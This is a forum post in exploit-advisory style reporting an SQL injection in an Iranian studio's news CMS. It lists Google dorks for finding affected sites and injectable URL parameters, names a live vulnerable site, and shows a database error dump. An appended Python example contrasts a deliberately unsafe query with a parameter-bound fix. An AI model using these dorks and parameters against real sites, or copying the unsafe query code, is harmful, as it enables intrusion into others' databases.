Subject: Media-Art HaaYahoo طراحی و اجرا: هنر رسانه SQL Inj
KingSkrupellos
Comment: #1
30.09.2018 02:59
##############################################################################################################

# Exploit Title : Media-Art.ir HaaYahoo Web Design Studio Iran طراحی و اجرا: هنر رسانه SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepage : media-art.ir ~ haayahoo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

##############################################################################################################

# Google Dorks :

intext:''طراحی و اجرا: هنر رسانه''

intext:''مجری سایت: هنررسانه''

intext:''طراحی و توسعه هیاهـو''

# SQL Injection Exploits :

/newspaper/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]

/newspaper/index.php?year=%7Bdate-year%7D&month=%7Bdate-month%7D&day=%7Bdate-day%7D&category=[SQL Injection]

/news/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]

/PATH/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]

/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]

/newspaper/index.php?newsid=[SQL Injection]

/newspaper/engine/print.php?newsid=[SQL Injection]

/index.php?newsid=[SQL Injection]

##############################################################################################################

# Example Vulnerable Site =>

jahansanat.ir/newspaper/index.php?year=1396&month=01&day=28&category=[SQL] => [ Proof of Concept ] => archive.is/YXXPC

# SQL Database Error =>

MySQL error in file: /engine/modules/show.short.php at line 65
Error Number: 1064
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near 'AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date < '2018-09-30 ' at line 1
SQL query:

SELECT p.id, p.autor, p.date, p.short_story, CHAR_LENGTH(p.full_story) as full_story, p.xfields, p.title,
p.category, p.alt_name, p.comm_num, p.allow_comm, p.fixed, p.tags, e.news_read, e.allow_rate, e.rating, e.vote_num,
e.votes, e.view_edit, e.editdate, e.editor, e.reason FROM dle_post p LEFT JOIN dle_post_extras e ON (p.id=e.news_id)
WHERE date >= '2017-04-17' AND category= AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date
< '2018-09-30 03:13:55' ORDER BY date DESC LIMIT 0,1

##############################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

We don't care what people think about us; we are proud of ourselves and we are not going to change for anyone. I do not have my own website. No contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.
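
The error output in the post shows the `category` request value placed unquoted into the `WHERE` clause (`category= AND date < ...`). As an added example, not part of the original post or the vendor's code, the Python/sqlite3 code below reproduces that query shape against a constructed table and contrasts it with a handler that validates the id and binds parameters. The function names, the table contents and the SQLite date arithmetic are assumptions standing in for the PHP/MySQL original.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the dle_post table named in the error output.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dle_post (id INTEGER PRIMARY KEY, title TEXT,"
               " category INTEGER, date TEXT, approve INTEGER)")
    db.executemany("INSERT INTO dle_post VALUES (?,?,?,?,?)", [
        (1, "constructed row A", 3, "2017-04-17 09:00:00", 1),
        (2, "constructed row B", 4, "2017-04-17 10:00:00", 1),
        (3, "constructed row C", 3, "2017-04-17 11:00:00", 0),
    ])
    return db

def short_list_unsafe(db, day_start, category):
    # Same shape as the failing query: the request value is pasted in unquoted,
    # so an empty value already breaks the statement ("category= AND ...").
    sql = ("SELECT id, title FROM dle_post WHERE date >= '" + day_start + "'"
           " AND category=" + category +
           " AND date < datetime('" + day_start + "', '+24 hours')"
           " AND approve=1 ORDER BY date DESC")
    return db.execute(sql).fetchall()

def parse_id(raw, low=1, high=2**31 - 1):
    # Accept plain ASCII decimal digits only, inside an explicit range.
    # isascii() matters: str.isdigit() alone also accepts non-ASCII digits.
    if not (isinstance(raw, str) and raw.isascii() and raw.isdigit()
            and len(raw) <= 10):
        raise ValueError("not a numeric id")
    value = int(raw)
    if not low <= value <= high:
        raise ValueError("id out of range")
    return value

def short_list_safe(db, day_start, category_raw):
    # Validate first, then bind: the SQL text never contains request data.
    category = parse_id(category_raw)
    sql = ("SELECT id, title FROM dle_post WHERE date >= ? AND category = ?"
           " AND date < datetime(?, '+24 hours') AND approve = 1"
           " ORDER BY date DESC")
    return db.execute(sql, (day_start, category, day_start)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(short_list_safe(db, "2017-04-17", "3"))
```

The same two steps apply to the other parameters listed in the post (`year`, `month`, `day`, `newsid`): reject anything that is not a numeric id before the query is built, and pass the value as a bound parameter.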